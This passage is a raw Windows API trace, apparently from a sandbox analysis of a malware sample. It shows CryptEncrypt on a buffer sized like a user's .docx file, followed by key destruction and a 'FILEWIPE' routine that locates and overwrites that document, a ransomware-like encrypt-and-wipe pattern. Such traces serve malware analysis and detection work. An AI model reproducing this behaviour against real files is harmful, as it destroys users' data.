CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.812] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.812] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x5920, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x5930) returned 1 [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.812] CharLowerBuffW (in: lpsz="byte[22833]", cchLength=0xb | out: lpsz="byte[22833]") returned 0xb [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.813] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.813] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x965b90*, pdwDataLen=0x6ae220*=0x5920, dwBufLen=0x5930 | out: pbData=0x965b90*, pdwDataLen=0x6ae220*=0x5930) returned 1 [0035.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.813] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.814] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.814] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.814] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.814] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.814] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.814] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.814] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.816] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.816] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.817] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.817] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.817] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.817] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.817] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0035.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.817] CryptDestroyKey (hKey=0x7c2200) returned 1 [0035.817] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.817] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.818] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.818] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.818] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.818] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.818] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.818] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.818] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.818] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0035.818] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.818] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.818] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.818] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.818] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.818] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.818] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.819] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.819] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.819] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.819] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.819] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.819] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.819] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.819] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.819] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.819] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.820] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.820] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.820] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.820] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.820] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.821] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.822] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.822] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.822] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.822] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4208cb0, ftCreationTime.dwHighDateTime=0x1d5c2e7, ftLastAccessTime.dwLowDateTime=0xa51234c0, ftLastAccessTime.dwHighDateTime=0x1d5c200, ftLastWriteTime.dwLowDateTime=0xa51234c0, ftLastWriteTime.dwHighDateTime=0x1d5c200, nFileSizeHigh=0x0, nFileSizeLow=0x5920, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ulG-P8FTHS2s.docx", cAlternateFileName="ULG-P8~1.DOC")) returned 0x7c2100 [0035.822] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.822] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.822] CharLowerBuffW (in: lpsz="byte[22816]", cchLength=0xb | out: lpsz="byte[22816]") returned 0xb [0035.822] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.822] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.823] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.823] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.823] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.823] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.824] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, 